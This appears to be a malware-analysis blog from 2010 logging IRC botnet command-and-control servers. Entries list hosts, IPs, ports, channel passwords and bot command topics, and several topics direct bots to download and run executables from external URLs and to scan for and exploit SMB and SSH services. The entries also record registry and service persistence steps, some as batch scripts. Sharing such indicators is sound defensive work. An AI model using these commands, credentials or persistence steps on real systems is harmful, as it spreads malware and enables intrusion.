Thursday, December 23, 2010

irc.wanger.biz (Yewnix)

irc.wanger.biz:8782
46.4.232.76:8782
Nick: :{00-USA-XP-pc7-7123}
Username: blaze
Server Pass: weed
Joined Channel: #sshscan2
Channel Topic for Channel #sshscan2: ".scan sshgodscan 38 8 0 192.x.x.x -n -b |.scan sshgodscan 30 8 0 141.x.x.x -n -b |.scan sshgodscan 30 8 0 218.x.x.x -n -b"
Set by Yewnix on Tue Dec 21 20:50:57
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 218.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 192.x.x.x:22 with a delay of 8 seconds for 0 minutes using 38 threads."
Private Message to User {iNF-00-USA-XP-p\xb8\x8cI: "SC// Random Port Scan started on 141.x.x.x:22 with a delay of 8 seconds for 0 minutes using 30 threads."

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows Data Serivce system32.exe
C:\WINDOWS\system32.exe

Sunday, December 19, 2010

aaaaaaaa.schooluni.us (bfbot) &(rxbot)

Found 2 addresses
addr: aaaaaaaa.schooluni.us ip: 109.196.130.66
addr: aaaaaaaa.schooluni.us ip: 109.196.130.50

aaaaaaaa.schooluni.us:7196
PASS laorosr
Channel: #dpi
Channel: #!
KCIK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://61.136.59.34/mobi.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by nonSTOPspread66 on Sat Dec 18 23:19:01

Process
HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run\
Microsoft Driver Setup
C:\WINDOWS\gwdrive32.exe

Friday, December 17, 2010

im.maximum-irc.info

Found 4 addresses
addr: im.maximum-irc.info ip: 119.202.198.117
addr: im.maximum-irc.info ip: 139.91.102.100
addr: im.maximum-irc.info ip: 139.91.102.101
addr: im.maximum-irc.info ip: 150.165.168.123
im.maximum-irc.info:9595
139.91.102.101:9595
Nick: [USA|00|XP|P|48168]
Username: ywzyhaf
Server Pass: Peja0444@
Joined Channel: #!!IM!! with Password fatj00
Channel Topic for Channel #!!IM!!: ".dl.start http://dl.dropbox.com/u/14684555/r.exe C:\r.exe 1 -s"

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows winlogin.exe
C:\WINDOWS\winlogin.exe

bean.F-QACS.INFO

bean.F-QACS.INFO:5337
178.162.175.63:5337
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed

HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Windows Service Host
C:\Documents and Settings\Administrator\Application Data\svchost.exe

flash.quickupdates.net (Yewnix)

flash.quickupdates.net:5337
46.4.232.76:5337
Nick: :{00-USA-XP-pc3-3370}
Username: blaze
Joined Channel: #join with Password error
Channel Topic for Channel #join: ".aSc -S |.sub |.wu |.worm |.scan svrsvc_BRUTE 45 20 100 -r -b -e -s |.scan SVRSVC_ESP 35 3 0 -b -r -e -s |.scan SVRSVC_ESP_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_ARG 35 3 0 -b -r -e -s |.scan SVRSVC_ARG_SP2 35 3 0 -b -r -e -s |.scan SVRSVC_RUS 35 3 0 -b -r -e -s |.scan SVRSVC_RUS_SP2 35 3 0 -b -r -e -s"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Windows Data Serivce C:\WINDOWS\services.exe

Wednesday, November 3, 2010

pig.botsgod.info

Botnet C&C irc
Found 3 addresses
addr: pig.botsgod.info ip: 217.70.188.30
addr: pig.botsgod.info ip: 92.243.28.194
addr: pig.botsgod.info ip: 95.142.163.184

pig.botsgod.info:5900
User Name: VirUs
Real Name: Iam_PIG_And_Iam_A_GAY0003
Password: isPigaGAY
Nick Name: [USA][XP-SP3]371106
Channel:##ENC##
Password:Pig_IS_STUPID

Topic is '!NL FRRN%^^UUU]QGRCN?J?AC]A3K^NPCEW^BAVN`]HNCE QQBQBC]CVC | !NL FRRN%^^QCPTCP\B?R?]2CR^G2QR?JJ]}#"~~]CVC ?QBQB]CVC | !NL FRRN%^^NP3K3SN]G2D3^QCRSN"`~]CVC QBQBBB]CVC | !NL FRRN%^^Q3DRU?PCU3PI]2CR^G2QR?JJ]}#"~~]CVC ufuf]gzg'
* Set by xXx on Wed Nov 03 17:52:13

Creates value "Microsoft UneXpected"="C:\TEMP\mtfsys32.exe" in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
Creates a mutex PigGotFucKedManyTimesAndAlreadyProvedHimGay.
Creates process "mtfsys32.exe".

Malware URL
http://www.sitepalace.com/pregy/ENCS1p1.jpeg

Tuesday, July 6, 2010

gangbang.mytijn.org ( ssh2 )

gangbang.mytijn.org DNS_TYPE_A 98.156.90.172 85.92.87.233
98.156.90.172:43000
Botnet C&C irc
Nick: |KOR|XP|00|803303|
Username: SP3-443
Server Pass: scary
Joined Channel: #!ssh with Password ERROR
Channel Topic for Channel #!ssh: ".aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 86.x.x.x -b -r -s"

Startup
Services Created:
Name Type Path
Windows System Updates SERVICE_AUTO_START "C:\Documents and Settings\Administrator\Application Data\exxploiter.exe"

Saturday, July 3, 2010

irc.metraiciono.com

irc.metraiciono.com DNS_TYPE_A 95.211.84.164

95.211.84.164:6567
Botnet C&C irc
Nick: [SI|AUT|00|P|04244]
Username: XP-5923
Server Pass: pr1v4d0onl1n3r
Joined Channel: #canal1# with Password c1rc0s0leil
Channel Topic for Channel #canal1#: ".desfi http://174.121.2.222/~toxicok/wp-content/languages/home.exe c:\WINDOWS\home.exe 1"
Private Message to Channel #canal1#: "[Dl]: File download: 128.0KB to: c:\WINDOWS\home.exe @ 64.0KB/sec."
Private Message to Channel #canal1#: "[Dl]: Created process: "c:\WINDOWS\home.exe", PID: <448>"

Startup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe

Friday, July 2, 2010

l33t.shadow-mods.net ( RadXScan )

l33t.shadow-mods.net:6667
91.121.78.121:6667

Botnet C&C irc
channel:##konvit-rad##
key:f00kU


Startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=svchost.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes

service -i
net start svcfost

irc.bigshitsandwich.org ( RadXScan )

irc.bigshitsandwich.org:6667
83.170.84.20:6667

Botnet C&C irc
Channel:#mp3-ops
key:fuckU
* Topic is '.scan 77'
* Set by doom on Sat Jul 03 07:58:54

[Scan] [Complete] [Range: 77.244.0.0-77.244.255.255] [DigiX]
[ReScan] [Initiated] [DigiX]
[Scan] [Range: 77.106.0.0-77.106.255.255] [DigiX]
[Found Radmin] [Info: 77.126.12.173/No Pass] [DigiX]

Startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=Radx.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes

service -i
net start svcfost

Thursday, July 1, 2010

gangbang.mytijn.org

gangbang.mytijn.org DNS_TYPE_A 85.92.87.233 98.156.90.172

85.92.87.233:25343

Botnet C&C irc
Nick: :|XP|00|AUT|79994
Username: PotHead
Server Pass: scary
Joined Channel: #Main# with Password ERROR
Channel Topic for Channel #Main#: ".scan RUS 35 3 0 -b -s"

Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info cRSCS crscs.exe

Wednesday, June 30, 2010

ulove.tigolbittys.info

Domains and Sub Domains
ilove.tigolbittys.info
ulove.tigolbittys.info
free.tinypicbox.com
one.tinypicbox.com

ulove.tigolbittys.info DNS_TYPE_A
178.32.55.3
83.15.10.202
91.121.78.121
178.32.48.79
178.32.49.4

Botnet C&C irc

83.15.10.202:7171

psyBNC2.3.2-7
Connected. Now logging in...
User Anonymous logged in.
-
Your IRC Client did not support a password. Please type /QUOTE PASS your password to connect.

Nick: [00|AUT|148343]
Username: XP-9617
Server Pass: fuck3d

Channel: #links#
Channel: #hp#

Topic is '^run.stop -s|^run http://dessertsrecipes.net/katrian/shell/r.exe c:\45jknl.exe 1|^asc -S -s|^http http://dessertsrecipes.net/katrian/shell/h.exe|^asc svrsvc_all 30 3 0 -e -b -s'
Set by ajlk on Wed Jun 30 05:55:57

Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info Windows Notify Service wntfy.exe

updat1.bejsis.com

Botnet C&C IRC
210.170.62.106:1234
Nick: n[AUT|XP]6732262
Username: 9142
Joined Channel: #dl#

Startup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
info Userinit C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\redfil.exe

Tuesday, June 29, 2010

java.KUTLUFAMILY.COM

java.KUTLUFAMILY.COM
88.255.104.172:81
Botnet C&C irc
Nick: [00_AUT_XP_1113366]
Username: SP3-899
Joined Channel: #kk with Password ^B^B^B^B
Channel Topic for Channel #kk: ".asc -S -s |.http http://94.76.194.116/k.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/bro.jpg c:\y2b3k2i6x6b9.exe c:\y2b3k2i6x6b9.exe -r -h"
Private Message to Channel #kk: "scan; Trying to get external IP."
Private Message to Channel #xs: "HTTP SET http://94.76.194.116/k.exe"
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads."
Private Message to Channel #kk: "scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads."

Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe

Friday, June 25, 2010

ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C irc
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe"
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

Startup
The following registry values are added so that cndrive32.exe runs every time Windows starts:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"